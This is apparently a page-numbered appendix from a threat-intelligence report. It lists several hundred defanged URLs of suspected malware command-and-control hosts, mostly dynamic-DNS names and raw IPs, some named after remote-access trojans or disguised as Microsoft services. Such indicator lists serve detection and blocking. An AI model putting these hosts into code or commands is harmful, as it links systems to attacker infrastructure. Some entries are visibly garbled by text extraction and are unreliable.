hxxp://25.66.198.77/ 
hxxp://34.211.181.161/ 
hxxp://35.176.10.40/ 
hxxp://37.104.186.158/ 
hxxp://37.115.47.107/ 
hxxp://41.101.5.34/ 
hxxp://41.102.235.191/ 
hxxp://41.58.69.217/ 
hxxp://41.58.96.58/ 
hxxp://43.254.134.157/ 
hxxp://45.76.87.6/ 
hxxp://46.164.167.42/ 
hxxp://46.246.5.130/ 
hxxp://46.246.85.131/ 


hxxp://5.101.170.159/ 
6998 


hxxp://5.187.49.231/ 
hxxp://5.188.231.235/ 
hxxp://5.34.183.64/ 
hxxp://52.138.216.83/ 
hxxp://52.87.114.116/ 
hxxp://56d8ala6.hopto.org/ 
hxxp://60.10.0.13/ 
hxxp://62.235.139.42/ 
hxxp://63.237.57.222/ 
hxxp://65.184.25.147/ 
hxxp://66fmicro.duckdns.org/ 
hxxp://68.53.163.100/ 
hxxp://6alexander9.ddns.net/ 
hxxp://76.73.114.50/ 
hxxp://77.139.164.191/ 
hxxp://77.48.28.227/ 
hxxp://78.12.174.157/ 
hxxp://78.12.177.32/ 
hxxp://78.130.176.162/ 
hxxp://79.134.225.116/ 
hxxp://81.231.10.43/ 
hxxp://81.61.79.44/ 
hxxp://84.151.157.38/ 
hxxp://85.110.45.5/ 


hxxp://87.11.97.192/ 


6999 


hxxp://89.134.165.187/ 
hxxp://90.96.103.203/ 
hxxp://92.122.53.40/ 
hxxp://92.222.112.70/ 
hxxp://94.183.210.219/ 
hxxp://94.237.28.110/ 
hxxp://95.100.252.51/ 
hxxp://95.154.199.21/ 
hxxp://a5la8y1201.ddns.net/ 
hxxp://aa123.zapto.org/ 
hxxp://aaaa5.hopto.org/ 
hxxp://abdodz.ddns.net/ 
hxxp://abdou1234.hopto.org/ 
hxxp://abdulla244.myftp.biz/ 
hxxp://abidas2018.ddns.net/ 
hxxp://abo6na.no-ip.org/ 
hxxp://abrilparadon.duckdns.org/ 
hxxp://adidas2018.ddns.net/ 
hxxp://aditrix.ddns.net/ 
hxxp://adminirq.no-ip.biz/ 
hxxp://adsfca.duckdns.org/ 
hxxp://agbero.duckdns.org/ 
hxxp://ahlanc500.zapto.org/ 
hxxp://ahmad025.ddns.net/ 


hxxp://ahmed461.ddns.net/ 
7000 


hxxp://ahmedhero2020.zapto.org/ 


hxxp://ahmedmhmed4711.ddns.net/ 


hxxp://ahmedstar123.ddns.net/ 
hxxp://ahmetabis.duckdns.org/ 
hxxp://akramhbcl.ddns.net/ 
hxxp://alaal70.hopto.org/ 
hxxp://aldiwani.no-ip.biz/ 
hxxp://alemania.duckdns.org/ 
hxxp://alger07.ddns.net/ 
hxxp://alill.sytes.net/ 
hxxp://ali123.ddns.net/ 
hxxp://alicemedrado.no-ip.org/ 
hxxp://alihacker2018.no-ip.biz/ 
hxxp://alihazm2017.no-ip.biz/ 
hxxp://aliking123.ddns.net/ 
hxxp://alisami.hopto.org/ 
hxxp://alkal.publicvm.com/ 
hxxp://almlk.ddns.net/ 
hxxp://alone.sytes.net/ 
hxxp://alsha2e.zapto.org/ 
hxxp://am22am.ddns.net/ 
hxxp://amanal.duckdns.org/ 
hxxp://ambush.ddns.net/ 
hxxp://amerkad19.ddns.net/ 


hxxp://aminesaflo.hopto.org/ 


7001 


hxxp://amjad.no-ip.org/ 
hxxp://amma.myftp.biz/ 
hxxp://ammar906klashnkof.myq-see.com/ 
hxxp://anahowa.duckdns.org/ 
hxxp://anamzh.ddns.net/ 
hxxp://android68.ddns.net/ 
hxxp://andynox2018.myddns.me/ 
hxxp://annonymous1921.ddns.net/ 
hxxp://anonyklax.duckdns.org/ 
hxxp://anonymato.duckdns.org/ 
hxxp://anonymous1999.hopto.org/ 
hxxp://anonymoushora032.ddns.net/ 
hxxp://aoa.myq-see.com/ 
hxxp://apatednsnet.duckdns.org/ 
hxxp://arabyouman.sytes.net/ 
hxxp://arielpica.ddns.net/ 
hxxp://asd10.ddns.net/ 
hxxp://asdaasda.ddns.net/ 
hxxp://assurancework.ddns.net/ 
hxxp://avast666.duckdns.org/ 
hxxp://azeezdeaf1122.ddns.net/ 
hxxp://azeezdeaf1996.hopto.org/ 
hxxp://azzaenstp.no-ip.biz/ 
hxxp://b3d3h3ckd.ddns.net/ 


hxxp://bachir12345.hopto.org/ 
7002 


hxxp://badnulls.hopto.org/ 
hxxp://barakat.servegame.com/ 
hxxp://basyouni4.ddns.net/ 
hxxp://bbus19.ddns.net/ 
hxxp://becharakam.ddns.net/ 
hxxp://bedwipro987.ddns.net/ 
hxxp://bellevie.duckdns.org/ 
hxxp://benjamin1996.ddns.net/ 
hxxp://benjamin1996121.ddns.net/ 
hxxp://betterlifecommerce.ddns.net/ 
hxxp://bibich.myftp.biz/ 
hxxp://bkjy1122334455.ddns.net/ 
hxxp://blakbass.linkpc.net/ 
hxxp://b0b2030.ddns.net/ 
hxxp://bobyhack.duckdns.org/ 
hxxp://brothersjoy.nl/ 
hxxp://bug000.hopto.org/ 
hxxp://by-sabotage123.duckdns.org/ 
hxxp://by900.zapto.org/ 
hxxp://c.top4top.net/ 
hxxp://cabbac.ddns.net/ 
hxxp://caoil11.ddns.net/ 
hxxp://carding.hopto.org/ 
hxxp://carrochevere.no-ip.biz/ 


hxxp://casinonono.ddns.net/ 


7003 


hxxp://cerbere9889.ddns.net/ 
hxxp://cg.ddns.net/ 
hxxp://chazun.ddns.net/ 
hxxp://cheatkogama.ddns.net/ 
hxxp://chinzo.myftp.biz/ 
hxxp://chrom.webhop.info/ 
hxxp://chrome1.hopto.org/ 
hxxp://chrome2018.zapto.org/ 
hxxp://civita2.no-ip.biz/ 
hxxp://claxysme.ddns.net/ 
hxxp://clay157.no-ip.org/ 
hxxp://clivoucanada.no-ip.org/ 
hxxp://clmodding.ddns.net/ 
hxxp://cobaiadanet.duckdns.org/ 
hxxp://connectionsdfghhh.myftp.biz/ 
hxxp://connectionsxxx.ddns.net/ 
hxxp://cownzhackr.ddns.net/ 
hxxp://crazy-evil.no-ip.biz/ 
hxxp://creazionisa.com/ 
hxxp://cule.ddns.net/ 
hxxp://dabii.ddns.net/ 
hxxp://daisy101.ddns.net/ 
hxxp://darkfag1337.hopto.org/ 
hxxp://darkmonster255.ddns.net/ 


hxxp://darkvador.duckdns.org/ 
7004 


hxxp://dataday.no-ip.org/ 
hxxp://dd00ddee.ddns.net/ 
hxxp://ddlink2.ddns.net/ 
hxxp://ddns.catamosky.biz/ 
hxxp://ddnsrat.ddns.net/ 
hxxp://deity.ddns.net/ 
hxxp://delightc.myftp.biz/ 
hxxp://devsex.ddns.net/ 
hxxp://dhayan.ddns.net/ 
hxxp://dinamarca.duckdns.org/ 
hxxp://dixenweb.ddns.net/ 
hxxp://dl.dropbox.com/ 
hxxp://doc.internetdocss.com/ 
hxxp://doctordido.no-ip.org/ 
hxxp://dontexe.duckdns.org/ 
hxxp://dooooox.ddns.net/ 
hxxp://doublekits.duckdns.org/ 
hxxp://dr-prohak.myddns.me/ 
hxxp://duckdns.org/ 
hxxp://duconunun.ddns.net/ 
hxxp://dzad.ddns.net/ 
hxxp://ecksdi.ddns.net/ 
hxxp://ejiroprecious.ddns.net/ 
hxxp://elmagic2.ddns.net/ 


hxxp://emad1300.ddns.net/ 


7005 


hxxp://emad1987.myq-see.com/ 
hxxp://emilylattaa4111.serveftp.com/ 
hxxp://empezarll.mywire.org/ 
hxxp://ena.sytes.net/ 
hxxp://enero.duckdns.org/ 
hxxp://enghackernoip.ddns.net/ 
hxxp://essam554.hopto.org/ 
hxxp://essssssam.ddns.net/ 
hxxp://ethicalhacking.myftp.biz/ 
hxxp://evilgseguiyerrt.ddns.net/ 
hxxp://eyocbp.duckdns.org/ 
hxxp://ezelogs.ddns.net/ 
hxxp://fadiana1995.ddns.net/ 
hxxp://fanddes.ddns.net/ 
hxxp://foscam.myftp.biz/ 
hxxp://fd8a8df5.ddns.net/ 
hxxp://felestine.hopto.org/ 
hxxp://fidrali.no-ip.biz/ 
hxxp://fileserv004.ddns.net/ 
hxxp://fitnesswebsite.duckdns.org/ 
hxxp://fo2shal.myq-see.com/ 
hxxp://focariongorda.duckdns.org/ 
hxxp://fortoriko.ddns.net/ 
hxxp://freelancertupidor.myftp.org/ 


hxxp://freetools.hidns.ru/ 
7006 


hxxp://frsyescd.ddns.net/ 
hxxp://fsoc.ddns.net/ 
hxxp://fudman.duckdns.org/ 
hxxp://fw2.sshreach.me/ 
hxxp://gamezerer.ddns.net/ 
hxxp://gangshitxd.bounceme.net/ 
hxxp://ggwp123.ddns.net/ 
hxxp://ghanaandco.sytes.net/ 
hxxp://giannigianni.ddns.net/ 
hxxp://giustini.ddns.net/ 
hxxp://glendyling.ddns.net/ 
hxxp://gobali.hopto.org/ 
hxxp://gogotest-46542.portmap.io/ 
hxxp://goodattack.ddns.net/ 
hxxp://googlechromehost.ddns.net/ 
hxxp://googlehotspotxxxx.no-ip.biz/ 
hxxp://gorel1004.ze.am/ 
hxxp://gr44.ddns.net/ 
hxxp://grrrfggfgfg.ddns.net/ 
hxxp://gujulio.duckdns.org/ 
hxxp://gustavomaxwell.ddns.net/ 
hxxp://gvgvgv.ddns.net/ 
hxxp://nack2rio.hopto.org/ 
hxxp://hacker-soft.ddns.net/ 


hxxp://hackingloading157.ddns.net/ 
7007 


hxxp://hackrooo.ddns.net/ 
hxxp://hahwa0404.ddns.net/ 
hxxp://haider2002.ddns.net/ 
hxxp://haider2121.hopto.org/ 
hxxp://hakanonymos4.ddns.net/ 
hxxp://hakerbatna.ddns.net/ 
hxxp://hakerz123.ddns.net/ 
hxxp://hakoukh40.ddns.net/ 
hxxp://hakrbatna.hopto.org/ 
hxxp://hakrdz111.serveftp.com/ 
hxxp://haniameer.hopto.org/ 
hxxp://haram222.ddns.net/ 
hxxp://hassan360.ddns.net/ 
hxxp://naxorspamer.hopto.org/ 
hxxp://hellohello.ddns.net/ 
hxxp://hexycz.ddns.net/ 
hxxp://heyklog.duckdns.org/ 
hxxp://hh11ihh11.ddns.net/ 
hxxp://hAhhh1122.no-ip.biz/ 
hxxp://hicham9risa.duckdns.org/ 
hxxp://hinou.ddns.net/ 
hxxp://hoang2667.zapto.org/ 
hxxp://horizontg.ddns.net/ 
hxxp://host355.casacam.net/ 


hxxp://host775544.ddns.net/ 
7008 


hxxp://housam.linkpc.net/ 
hxxp://htlIrnjrat.ddns.net/ 
hxxp://Nxxp/ 
hxxp://hycotanas.ddns.net/ 
hxxp://hykedscams.ddns.net/ 
hxxp://hyoof10.ddns.net/ 
hxxp://iamn1.ddns.net/ 
hxxp://ichbinw1337.ddns.net/ 
hxxp://id700mz.ddns.net/ 
hxxp://idontratpeople.ddns.net/ 
hxxp://igi789.ddns.net/ 
hxxp://iheuche009.hopto.org/ 
hxxp://infectiousvisionl.ddns.net/ 
hxxp://inohackyouxd.hopto.org/ 
hxxp://ionutsef2.ddns.net/ 
hxxp://ippoofer.ddns.net/ 
hxxp://iraql12.ddns.net/ 
hxxp://iska123.ddns.net/ 
hxxp://issal9900.ddns.net/ 
hxxp://izan.hopto.org/ 
hxxp://jOe3gipuv.hopto.org/ 
hxxp://jOs3d4rk.ddns.net/ 
hxxp://jLus3tan5stu8pid.ddns.net/ 


hxxp://jaaav.ddns.net/ 


7009 


hxxp://jakzaz555.ddns.net/ 
hxxp://jal.ze.am/ 
hxxp://japontarzi.duckdns.org/ 
hxxp://jaxboss.publicvm.com/ 
hxxp://jerry331990.jerrydns.pw/ 
hxxp://joker1.linkpc.net/ 
hxxp://jpaul.duckdns.org/ 
hxxp://junpio70.hopto.org/ 
hxxp://jutt9244.myftp.biz/ 
hxxp://k10e.ddns.net/ 
hxxp://kaboos99hacker.linkpc.net/ 
hxxp://kaka200222.ddns.net/ 
hxxp://kamalyousry1213.ddns.net/ 
hxxp://kaneki1997.ddns.net/ 
hxxp://karambaker.zapato.org/ 
hxxp://karamgamal878.ddns.net/ 
hxxp://karwan.ddns.net/ 
hxxp://kawaja.hopto.org/ 
hxxp://keypay033.dynu.net/ 
hxxp://khan2012.no-ip.biz/ 
hxxp://killcon.sytes.net/ 
hxxp://killuakiller.ddns.net/ 
hxxp://kingdomro.viewdns.net/ 
hxxp://kinglord22.ddns.net/ 


hxxp://kitinho.ddns.net/ 
7010 


hxxp://klabster82nulll.ddns.net/ 
hxxp://kofia1230.ddns.net/ 
hxxp://kok22.ddns.net/ 
hxxp://koko12.myftp.biz/ 
hxxp://kolabola.linkpc.net/ 
hxxp://kor1.zapto.org/ 
hxxp://koutafa.ddns.net/ 
hxxp://ksa3651.ddns.net/ 
hxxp://ksk7.gotdns.ch/ 
hxxp://ksks.gotdns.ch/ 
hxxp://lasourcetest.ddns.net/ 
hxxp://layane.ddns.net/ 
hxxp://Idouab.ddns.net/ 
hxxp://leehenry1973.ddns.net/ 
hxxp://lezharlezhar.no-ip.info/ 
hxxp://libraries.ddns.net/ 
hxxp://lig1.serveblog.net/ 
hxxp://likenetstatlol.ddns.net/ 
hxxp://lillliiil.ddns.net/ 
hxxp://lilop.ddns.net/ 
hxxp://logarsogar.hopto.org/ 
hxxp://loginsecure.mywire.org/ 
hxxp://lolo.no-ip.info/ 
hxxp://lotsh.ddns.net/ 


hxxp://loveayada.zapto.org/ 


7011 


hxxp://lovejoks.no-ip.biz/ 
hxxp://m4grinexploit.ddns.net/ 
hxxp://maharek123456.ddns.net/ 
hxxp://mahonel1l1.ddns.net/ 
hxxp://mainjhin.duckdns.org/ 
hxxp://mal3on.ddns.net/ 
hxxp://malak9797.ddns.net/ 
hxxp://malakigoy.ddns.net/ 
hxxp://mamoon.ddns.net/ 
hxxp://manou.hopto.org/ 
hxxp://maravilhahoteis.ddns.net/ 
hxxp://maroxvi.ddns.net/ 
hxxp://maxime10.ddns.net/ 
hxxp://maxpayne9.ddns.net/ 
hxxp://mdformo.ddns.net/ 
hxxp://medomshakel.ddns.net/ 
hxxp://meemo1233m.ddns.net/ 
hxxp://mekawy.hopto.org/ 
hxxp://mercymorrgan.wm01.to/ 
hxxp://meso.myftp. biz/ 
hxxp://mgnoongmz.ddns.net/ 
hxxp://mhmod.ddns.net/ 
hxxp://micrOsOft.duckdns.org/ 
hxxp://microsoft-ipv6.duckdns.org/ 


hxxp://microsoftl71.duckdns.org/ 
7012 


hxxp://microsoft24515062.serveftp.com/ 
hxxp://microsoftddns.ddns.net/ 
hxxp://microsoftserver.serveftp.com/ 
hxxp://microsoftsession.linkpc.net/ 
hxxp://microsoftupdates.pw/ 
hxxp://midoalhashmi.ddns.net/ 
hxxp://midoumed.ddns.net/ 
hxxp://mikas.ddns.net/ 
hxxp://minergate.sytes.net/ 
hxxp://mixterix.duckdns.org/ 
hxxp://mjlosker.hopto.org/ 
hxxp://mogofockerdu94.chickenkiller.com/ 
hxxp://mohamed1234.no-ip.biz/ 
hxxp://mohamedahmed123.ddns.net/ 
hxxp://mohammad2010.no-ip.biz/ 
hxxp://mohand8080.ddns.net/ 
hxxp://mongtrelgo.hopto.org/ 
hxxp://moonwork93.hopto.org/ 
hxxp://moskando.ddns.net/ 
hxxp://mouqgsud.duckdns.org/ 
hxxp://mrfmr123.ddns.net/ 
hxxp://mtateste.duckdns.org/ 
hxxp://mujo.ddns.net/ 
hxxp://mum14.hopto.org/ 


hxxp://myhostoftuptup.servebeer.com/ 


7013 


hxxp://mylifegod.ddns.net/ 
hxxp://myloves.publicvm.com/ 
hxxp://mynamechucknorris.ddns.net/ 
hxxp://myno.hopto.org/ 
hxxp://na20022a.ddns.net/ 
hxxp://naralam.ddns.net/ 
hxxp://nass12.ddns.net/ 
hxxp://nestonesto.duckdns.org/ 
hxxp://nettcpportsharing.serveftp.com/ 
hxxp://newanonjoe.ddns.net/ 
hxxp://nfadil.myq-see.com/ 
hxxp://ngrok. xiaotk.tk/ 
hxxp://night.dynu.net/ 
hxxp://nippon.hopto.org/ 
hxxp://nixonhabbo.duckdns.org/ 
hxxp://njgypto.linkpc.net/ 
hxxp://njhost.hopto.org/ 
hxxp://njrat05.ddns.net/ 
hxxp://njratftw123.hopto.org/ 
hxxp://nkgclaudinei.ddns.net/ 
hxxp://nkgclaudinei.duckdns.org/ 
hxxp://nkilishinkili. hopto.org/ 
hxxp://nmr-syria.ddns.net/ 
hxxp://nonnikcmg.duckdns.org/ 


hxxp://notelog11.ddns.net/ 
7014 


hxxp://notimposible.hopto.org/ 
hxxp://nu.mmafan.biz/ 
hxxp://nuevochancel.duckdns.org/ 
hxxp://nuttentool.ddns.net/ 
hxxp://nyjora.myq-see.com/ 
hxxp://olfi.zapto.org/ 
hxxp://omotogbo.ddns.net/ 
hxxp://onixoino.ddns.net/ 
hxxp://openthetcheka.ddns.net/ 
hxxp://opitalia.ddns.net/ 
hxxp://optimusl1.ddns.net/ 
hxxp://oriod445se.hopto.org/ 
hxxp://oryano.ddns.net/ 
hxxp://osiman.cf/ 
hxxp://osmanlimparatorlugu.duckdns.org/ 
hxxp://othmane5.ddns.net/ 
hxxp://ozill619.ddns.net/ 
hxxp://ozone.myftp.org/ 
hxxp://pablitoescobar.duckdns.org/ 
hxxp://paladins005.ddns.net/ 
hxxp://palestine2014.zapto.org/ 
hxxp://paoduenti.duckdns.org/ 
hxxp://patakos0010.ddns.net/ 
hxxp://pazparatodos.duckdns.org/ 


hxxp://pcctks.ddns.net/ 


7015 


hxxp://pikhateamspeak.duckdns.org/ 
hxxp://pistola404.duckdns.org/ 
hxxp://plo.ddns.info/ 
hxxp://pm2bitcoin.com/ 
hxxp://poderxtremo.duckdns.org/ 
hxxp://port5.ddns.net/ 
hxxp://portnj.ddns.net/ 
hxxp://ppooiimmnnbbOO.ddns.net/ 
hxxp://predatorshot.ddns.net/ 
hxxp://prime2018.duckdns.org/ 
hxxp://probityjrat5.duckdns.org/ 
hxxp://proemepror.ze.am/ 
hxxp://proemperor.ze.am/ 
hxxp://projecttestingforedu.chickenkiller.com/ 
hxxp://prorms.ddns.net/ 
hxxp://provafood.ddns.net/ 
hxxp://prrrorrrfrrr.myftp.biz/ 
hxxp://pwnedbydefalt.ddns.net/ 
hxxp://q3alkhater123.ddns.net/ 
hxxp://qqwweerr.ddns.net/ 
hxxp://queimaaivagaba.ddns.net/ 
hxxp://quickmessage.io/ 
hxxp://qwert.ddns.net/ 
hxxp://qwertardormad1223.ddns.net/ 


hxxp://qwetyu.hopto.org/ 
7016 


hxxp://rachid061574.hopto.org/ 
hxxp://racikelo.ddns.net/ 
hxxp://rainbow6.ddns.net/ 
hxxp://ramadan.mywire.org/ 
hxxp://ramzimbacscay.hopto.org/ 
hxxp://raramimil23.ddns.net/ 
hxxp://rat24695.ddns.net/ 
hxxp://rattatata.ddns.net/ 
hxxp://rattinguy.ddns.net/ 
hxxp://realhacking2018.3utilities.com/ 
hxxp://redereynol.ddns.net/ 
hxxp://redwatchlive001.ddns.net/ 
hxxp://renanzinho2411.ddns.net/ 
hxxp://resser2020.hopto.org/ 
hxxp://rezallta.ddns.net/ 
hxxp://riad123.ddns.net/ 
hxxp://riazi312015.ddns.net/ 
hxxp://rida9949.ddns.net/ 
hxxp://ririrorol23.ddns.net/ 
hxxp://romania23.zapto.org/ 
hxxp://romany14.ddns.net/ 
hxxp://ruleshack.ddns.net/ 
hxxp://rumpa70.ddns.net/ 
hxxp://rzkfofo.no-ip.org/ 


hxxp://sal23re.no-ip.org/ 


7017 


hxxp://sa7er-hacker.ddns.net/ 
hxxp://sa7er-hackre.ddns.net/ 
hxxp://sadosaykodzl1.ddns.net/ 
hxxp://sadsadsad.ddns.net/ 
hxxp://saidafrentesatanas.ddns.net/ 
hxxp://saif321.ddns.net/ 
hxxp://saifer2121.myftp.biz/ 
hxxp://sakagiller.com/ 
hxxp://salahjra.ddns.net/ 
hxxp://salehroot.linkpc.net/ 
hxxp://salma.ddns.net/ 
hxxp://samfam.pdns.cz/ 
hxxp://samops.ddns.net/ 
hxxp://sapiklar.duckdns.org/ 
hxxp://sare.myq-see.com/ 
hxxp://sasoO.myftp.org/ 
hxxp://savaki.duckdns.org/ 
hxxp://sayedkastilol1.hopto.org/ 
hxxp://scviroos.bounceme.net/ 
hxxp://sdafff.no-ip.biz/ 
hxxp://secureutility.redirectme.net/ 
hxxp://securit.linkpc.net/ 
hxxp://secutit.linkpc.net/ 
hxxp://sefrou20.ddns.net/ 


hxxp://seifrastabia.no-ip.biz/ 
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hxxp://semonsemon.zapto.org/ 
hxxp://serverclean.hopto.org/ 
hxxp://serveursam.hopto.org/ 
hxxp://serviceonline.duckdns.org/ 
hxxp://servicepcinfo.myddns.rocks/ 
hxxp://sexyas.ddns.net/ 
hxxp://shadowhakar41.ddns.net/ 
hxxp://shangri027.ddns.net/ 
hxxp://shemzh.ddns.net/ 
hxxp://shigra.sytes.net/ 
hxxp://shodann.ddns.net/ 
hxxp://shore.kozow.com/ 
hxxp://shytangz1.ddns.net/ 
hxxp://sidosido-crb.hopto.org/ 
hxxp://sikomoto.onthewifi.com/ 
hxxp://silent-kira.no-ip.info/ 
hxxp://sjad1995.myftp.biz/ 
hxxp://skullman.duckdns.org/ 
hxxp://slar.duckdns.org/ 
hxxp://smffuked.ddns.net/ 
hxxp://smox1111.ddns.net/ 
hxxp://smyle42.ddns.net/ 
hxxp://snipere3131.ddns.net/ 
hxxp://soso7.myq-see.com/ 


hxxp://splashnet.ddns.net/ 
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hxxp://ssed.ddns.net/ 
hxxp://sskizz.ddns.net/ 
hxxp://ssl-virustotal.com/ 
hxxp://ssss22.ddns.net/ 
hxxp://stanley10.linkpc.net/ 
hxxp://stub.ignorelist.com/ 
hxxp://sub2.qaysarpizzajo.xyz/ 
hxxp://suchfamily.eu/ 
hxxp://sucka.duckdns.org/ 
hxxp://sugesu.ddns.net/ 
hxxp://svchost101.ddns.net/ 
hxxp://svhosted.zapto.org/ 
hxxp://sys11.ddns.net/ 
hxxp://systemm.ddns.net/ 
hxxp://systemx.hopto.org/ 
hxxp://takethatshit.ddns.net/ 
hxxp://tala1234.zapto.org/ 
hxxp://target81.ddns.net/ 
hxxp://tata508.ddns.net/ 
hxxp://tbmh.ddns.net/ 
hxxp://teleporthack.ddns.net/ 
hxxp://test1fg.ddns.net/ 
hxxp://the-don187.publicvm.com/ 
hxxp://thefuturisus.ddns.net/ 


hxxp://thiagohora.hopto.org/ 
7020 


hxxp://tomhilker024.ddns.net/ 
hxxp://top2.alqaysarpizza.xyz/ 
hxxp://topwiko.ddns.net/ 
hxxp://tossonat.ddns.net/ 
hxxp://total-virus.myq-see.com/ 
hxxp://trabalhoaaa.ddns.net/ 
hxxp://trasatlis.sytes.net/ 
hxxp://tsdn.linkpc.net/ 
hxxp://ttmglaz.ddns.net/ 
hxxp://ture-free.ddns.net/ 
hxxp://turlututu.zapto.org/ 
hxxp://tutobaixei.ddns.net/ 
hxxp://unificaequatorial.ddns.net/ 
hxxp://unknown277.ddns.net/ 
hxxp://updatefacebook.serveblog.net/ 
hxxp://vam22.ddns.net/ 
hxxp://vantomrat1133.ddns.net/ 
hxxp://vendeto.hopto.org/ 
hxxp://vice.hopto.org/ 
hxxp://videntets3.ddns.net/ 
hxxp://viewi.publicvm.com/ 
hxxp://vikvik.duckdns.org/ 
hxxp://warda73.no-ip.biz/ 
hxxp://wazy1010.ddns.net/ 


hxxp://webconn.ddns.net/ 
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hxxp://wecollect.duckdns.org/ 
hxxp://wertyuio.ddns.net/ 
hxxp://westshark.ddns.net/ 
hxxp://wiindows.myvnc.com/ 
hxxp://windown7service.ddns.net/ 
hxxp://windowslogon.ddns.net/ 
hxxp://windowsuport.duckdns.org/ 
hxxp://winkwink.duckdns.org/ 
hxxp://winserver.zapto.org/ 
hxxp://woocum.blogsyte.com/ 
hxxp://wsoo.ddns.net/ 
hxxp://wtfwindows.myftp.biz/ 
hxxp://wymeserver777.ddns.net/ 
hxxp://xaker555.no-ip.org/ 
hxxp://xfxf.ddns.net/ 
hxxp://xnxx44.ddns.net/ 
hxxp://xpznrt2.ddns.net/ 
hxxp://xsaral2.dnnq.net/ 
hxxp://xtrmmarzonuevo.duckdns.org/ 
hxxp://xtyoservices.ddns.net/ 
hxxp://y9.ddns.net/ 
hxxp://yasircf.hopto.org/ 
hxxp://yazhagal4246.ddns.net/ 
hxxp://yojen0120.myddns.me/ 


hxxp://youfuckednow.ddns.net/ 
7022 


hxxp://younessp.ddns.net/ 
hxxp://youssefelmi.ddns.net/ 
hxxp://youtubersxd.ddns.net/ 
hxxp://yurmaufat.ddns.net/ 
hxxp://z8gamescf.ddns.net/ 
hxxp://zayd506.ddns.net/ 
hxxp://zebircp.duckdns.org/ 
hxxp://zef.bounceme.net/ 
hxxp://zekorap623.ddns.net/ 
hxxp://zerokart.kro.kr/ 
hxxp://zikokoko.ddns.net/ 
hxxp://zkthabani.hopto.org/ 
hxxp://zohirsenia.ddns.net/ 
hxxp://zueirasemlimites.duckdns.org/ 
hxxp://zzxxcc2018.hopto.org/ 
hxxp://103.21.117.143/ 
hxxp://103.38.252.63/ 
hxxp://103.40.163.55/ 
hxxp://103.44.145.245/ 
hxxp://104.238.176.9/ 
hxxp://105.101.151.77/ 
hxxp://105.108.35.56/ 
hxxp://105.199.18.240/ 
hxxp://106.51.163.232/ 


hxxp://108.61.211.219/ 
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hxxp://109.225.178.41/ 
hxxp://109.236.94.121/ 
hxxp://109.73.68.114/ 
hxxp://111.72.167.127/ 
hxxp://115.159.125.47/ 
hxxp://115.28.173.37/ 
hxxp://117.32.216.117/ 
hxxp://120.25.150.91/ 
hxxp://121.147.18.158/ 
hxxp://123.207.232.79/ 
hxxp://123456789123456789.myftp.biz/ 
hxxp://13.65.194.5/ 
hxxp://1337ace.ddns.net/ 
hxxp://1349874791.gnway.cc/ 
hxxp://137.0.0.1/ 
hxxp://138.122.118.154/ 
hxxp://139.199.187.28/ 
hxxp://14.222.182.50/ 
hxxp://141.255.144.72/ 
hxxp://141.255.148.161/ 
hxxp://141.255.150.159/ 
hxxp://141.255.159.49/ 
hxxp://144.48.242.221/ 
hxxp://1488.sytes.net/ 


hxxp://151.246.230.21/ 
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hxxp://151.247.143.125/ 
hxxp://151.248.126.183/ 
hxxp://151.72.17.61/ 
hxxp://156.206.211.12/ 
hxxp://159asd.duckdns.org/ 
hxxp://176.42.111.248/ 
hxxp://177mu.cn/ 
hxxp://178.74.111.106/ 
hxxp://181.143.118.164/ 
hxxp://183.82.99.133/ 
hxxp://185.32.221.23/ 
hxxp://185.82.220.152/ 
hxxp://186.84.216.126/ 
hxxp://187.180.186.181/ 
hxxp://188.166.76.144/ 
hxxp://188.215.131.47/ 
hxxp://188.24.119.27/ 
hxxp://188.3.13.98/ 
hxxp://189.174.125.60/ 
hxxp://190.240.24.2/ 
hxxp://192.137.0.15/ 
hxxp://192.248.32.193/ 
hxxp://192.92.42.25/ 
hxxp://197.2.81.35/ 


hxxp://197.35.134.69/ 
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hxxp://197.48.183.72/ 
hxxp://198.144.106.135/ 
hxxp://1987omid.ddns.net/ 
hxxp://1fon1.ddns.net/ 
hxxp://1M4962f897.iok.la/ 
hxxp://2.191.186.145/ 
hxxp://2.236.40.82/ 
hxxp://2.25.171.244/ 
hxxp://201.156.140.218/ 
hxxp://201.157.144.53/ 
hxxp://203.189.232.237/ 
hxxp://211.162.52.205/ 
hxxp://213.136.83.173/ 
hxxp://213.183.58.40/ 
hxxp://213.244.123.94/ 
hxxp://219.235.0.93/ 
hxxp://22134520.ddns.net/ 
hxxp://222.168.1.2/ 
hxxp://222.79.227.93/ 
hxxp://27.198.135.116/ 
hxxp://2715729.vicp.net/ 
hxxp://31.146.202.169/ 
hxxp://31.210.117.132/ 
hxxp://34.208.211.52/ 


hxxp://35.161.238.10/ 
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hxxp://37.114.212.119/ 
hxxp://37.115.170.240/ 
hxxp://37.152.166.4/ 
hxxp://37.16.139.86/ 
hxxp://37.239.8.89/ 
hxxp://37.254.193.172/ 
hxxp://39.43.231.228/ 
hxxp://41.226.168.63/ 
hxxp://41.38.56.81/ 
hxxp://45.126.124.155/ 
hxxp://46.150.252.235/ 
hxxp://46.166.134.149/ 
hxxp://46.4.255.98/ 
hxxp://5.135.127.183/ 
hxxp://5.189.137.186/ 
hxxp://5.222.66.57/ 
hxxp://5.222.70.95/ 
hxxp://5.234.240.27/ 
hxxp://5.237.98.77/ 
hxxp://5107b712.all123.net/ 
hxxp://52.193.97.24/ 
hxxp://5701c196.123nat.com/ 
hxxp://58.213.154.197/ 
hxxp://61.153.104.113/ 


hxxp://66.70.198.243/ 
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hxxp://6gh.noip.me/ 
hxxp://726627.duckdns.org/ 
hxxp://77.171.37.46/ 
hxxp://77.81.197.144/ 
hxxp://79.137.223.139/ 
hxxp://79.153.52.235/ 
hxxp://79649759.ddns.net/ 
hxxp://7daysky.in.3322.org/ 
hxxp://80.136.103.51/ 
hxxp://80.59.208.237/ 
hxxp://80.82.65.85/ 
hxxp://84.241.6.106/ 
hxxp://85.107.115.16/ 
hxxp://88.150.149.91/ 
hxxp://88.228.83.160/ 
hxxp://90.16.206.207/ 
hxxp://91.109.22.5/ 
hxxp://93.104.213.217/ 
hxxp://93.169.247.218/ 
hxxp://94.212.118.115/ 
hxxp://95.173.240.117/ 
hxxp://96750513.ddns.net/ 
hxxp://9949291099.hopto.org/ 
hxxp://a.tomx.xyz/ 


hxxp://alb2c3.hopto.org/ 
7028 


hxxp://aagaro.ddns.net/ 
hxxp://aasxzxdsc12324.no-ip.biz/ 
hxxp://abarouter.ddns.net/ 
hxxp://abbaass313.hopto.org/ 
hxxp://abbaass3132.hopto.org/ 
hxxp://abcccabccab.ddns.net/ 
hxxp://abderrahmane16.hopto.org/ 
hxxp://abdo099.ddns.net/ 
hxxp://abdobacha05.ddns.net/ 
hxxp://abdou16.hopto.org/ 
